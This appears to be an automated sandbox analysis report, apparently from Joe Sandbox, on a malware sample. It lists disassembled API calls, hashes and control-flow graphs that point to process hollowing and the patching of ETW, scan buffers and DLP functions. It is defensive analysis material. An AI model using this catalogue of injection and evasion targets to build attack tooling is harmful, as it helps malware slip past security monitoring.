                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                                                                              • API String ID: 2719805696-3542721025
                                                                                                              • Opcode ID: ffc24a7a7df1a84d1daf4fdaa54e8d33f80b4e9f53a5e4193e7ea85b45747935
                                                                                                              • Instruction ID: 0dc219dcba5b80a64fd5396abfa7a8f8743a0c4e9e5cd162314eaf19c8b892cb
                                                                                                              • Opcode Fuzzy Hash: ffc24a7a7df1a84d1daf4fdaa54e8d33f80b4e9f53a5e4193e7ea85b45747935
                                                                                                              • Instruction Fuzzy Hash: ED0140756D0214AFDB00EF98EC42E5ABBEDEB49700F51E464BD04D7640DA34AD61CF64
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 02E586D5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                              • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                              • API String ID: 3503870465-2520021413
                                                                                                              • Opcode ID: a3ed3f74c46eaa35baefa6d1d251dc1a23cfdd9c5f32981492a8377c1045ff85
                                                                                                              • Instruction ID: 85c76ea22ce7ff1f831283def4b7f5e400cc781c6f2ff1ffff480eb8051385bb
                                                                                                              • Opcode Fuzzy Hash: a3ed3f74c46eaa35baefa6d1d251dc1a23cfdd9c5f32981492a8377c1045ff85
                                                                                                              • Instruction Fuzzy Hash: 67014F346D0214AFEB04EBA9ED41F5ABBEEEB49700FA1D460BD00D7640DA74A981CE24
                                                                                                              APIs
                                                                                                              • RtlI.N(?,?,00000000,02E5DC7E), ref: 02E5DC2C
                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC42
                                                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Path$DeleteFileNameName_
                                                                                                              • String ID:
                                                                                                              • API String ID: 4284456518-0
                                                                                                              • Opcode ID: cc80a6882c0e4c5ecfaf8bfb5641fe9658a28093d2249ffe0e92c018b2a78e7a
                                                                                                              • Instruction ID: d7691143ba29f8136bcba25ae8106add3a7fdb7dd756cd490ba64a7940e0fcb4
                                                                                                              • Opcode Fuzzy Hash: cc80a6882c0e4c5ecfaf8bfb5641fe9658a28093d2249ffe0e92c018b2a78e7a
                                                                                                              • Instruction Fuzzy Hash: BB01D635AD460CAEEB05EBA0DD51FCD77BEAB44304F5194D2E600FB081DAB4AB048B25
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E44F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E44F2E
                                                                                                              • RtlI.N(?,?,00000000,02E5DC7E), ref: 02E5DC2C
                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC42
                                                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC61
                                                                                                                • Part of subcall function 02E44C60: SysFreeString.OLEAUT32(02E5F4A4), ref: 02E44C6E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                              • String ID:
                                                                                                              • API String ID: 1530111750-0
                                                                                                              • Opcode ID: b73eb5539eb09a25dfe978fd6f7034a8e9ce5b24b077503d422da6b51cd74700
                                                                                                              • Instruction ID: 93ac10486c68634278ba29a9ee0fc11db6cd6378ce67c43af46593b7f5c145e5
                                                                                                              • Opcode Fuzzy Hash: b73eb5539eb09a25dfe978fd6f7034a8e9ce5b24b077503d422da6b51cd74700
                                                                                                              • Instruction Fuzzy Hash: E9014471A9060CBEEB41EBA0DD52FCDB3BEEB48700F5194A1F600E2180EA746B048A64
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E56D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02E56DB9,?,?,?,00000000), ref: 02E56D99
                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,02E56EAC,00000000,00000000,02E56E2B,?,00000000,02E56E9B), ref: 02E56E17
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFromInstanceProg
                                                                                                              • String ID:
                                                                                                              • API String ID: 2151042543-0
                                                                                                              • Opcode ID: 0acede53254d8b2159400a45de6f145d8fd88dcce7a7b7efe69ab9f8ee895161
                                                                                                              • Instruction ID: 39dd2894e69a43210a89bdc2455020af1ca387a736d253e110923ea90c170540
                                                                                                              • Opcode Fuzzy Hash: 0acede53254d8b2159400a45de6f145d8fd88dcce7a7b7efe69ab9f8ee895161
                                                                                                              • Instruction Fuzzy Hash: 9601F7712987046EF711EF61DC2296F7BADD749B00B919835F805E2680EE309A00C960

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 4574 2e68128-2e68517 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e448ec 4689 2e693a1-2e69524 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e448ec 4574->4689 4690 2e6851d-2e686f0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e447ec call 2e449a0 call 2e44d74 call 2e44df0 CreateProcessAsUserW 4574->4690 4780 2e69cf5-2e6b2fa call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 * 16 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e57c10 call 2e58338 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 ExitProcess 4689->4780 4781 2e6952a-2e69539 call 2e448ec 4689->4781 4799 2e686f2-2e68769 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 4690->4799 4800 2e6876e-2e68879 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 4690->4800 4781->4780 4788 2e6953f-2e69812 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5f094 call 2e44860 call 2e449a0 call 2e446d4 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e47e5c 4781->4788 5046 2e69aef-2e69cf0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e449f8 call 2e58d70 4788->5046 5047 2e69818-2e69aea call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5e358 call 2e44530 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44de0 * 2 call 2e44764 call 2e5dc8c 4788->5047 4799->4800 4900 2e68880-2e68ba0 call 2e449f8 call 2e5de50 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5d164 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 4800->4900 4901 2e6887b-2e6887e 4800->4901 5217 2e68ba2-2e68bb4 call 2e58730 4900->5217 5218 2e68bb9-2e6939c call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 ResumeThread call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 CloseHandle call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e58080 call 2e5894c * 6 CloseHandle call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 4900->5218 4901->4900 5046->4780 5047->5046 5217->5218 5218->4689
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA
                                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02FBB7E0,02FBB824,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380), ref: 02E686E9
                                                                                                              • ResumeThread.KERNEL32(00000000,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8), ref: 02E68D33
                                                                                                              • CloseHandle.KERNEL32(00000000,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,00000000,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380), ref: 02E68EB2
                                                                                                                • Part of subcall function 02E5894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
                                                                                                                • Part of subcall function 02E5894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
                                                                                                                • Part of subcall function 02E5894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02EC7380,02E6B7B8,UacInitialize,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380), ref: 02E692A4
                                                                                                                • Part of subcall function 02E47E5C: GetFileAttributesA.KERNEL32(00000000,?,02E6041F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,UacInitialize), ref: 02E47E67
                                                                                                                • Part of subcall function 02E5DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DD5E), ref: 02E5DCCB
                                                                                                                • Part of subcall function 02E5DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E5DD05
                                                                                                                • Part of subcall function 02E5DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E5DD32
                                                                                                                • Part of subcall function 02E5DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E5DD3B
                                                                                                                • Part of subcall function 02E58338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E583C2), ref: 02E583A4
                                                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,Initialize,02EC7380,02E6B7B8,00000000,00000000,00000000,ScanString,02EC7380,02E6B7B8), ref: 02E6B2FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                              • API String ID: 2769005614-3738268246
                                                                                                              • Opcode ID: f4b6e3afe16d0d6d75b74fc4e34b8bd7e152a5a83373a29b29fa3c48fcac9362
                                                                                                              • Instruction ID: 706c83623c6b7c14d21930b117d55f04b5ee6fc24b7ec56f2fa4414f0d1780f8
                                                                                                              • Opcode Fuzzy Hash: f4b6e3afe16d0d6d75b74fc4e34b8bd7e152a5a83373a29b29fa3c48fcac9362
                                                                                                              • Instruction Fuzzy Hash: A7431B74BC015D8BCB10EB64EC85ADE73B6EB84340F60E1E5B509EB654DE30AE928F41

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 7740 2e63e12-2e65525 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5f094 call 2e44860 call 2e449a0 call 2e446d4 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5e358 call 2e44de0 call 2e44764 call 2e44de0 call 2e5dc8c Sleep call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e588b8 call 2e449a0 call 2e43244 call 2e5e678 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 Sleep call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e57c10 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e57c10 call 2e5894c call 2e588b8 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5e358 call 2e44de0 call 2e44764 call 2e44de0 call 2e5dc8c call 2e588b8 call 2e5f094 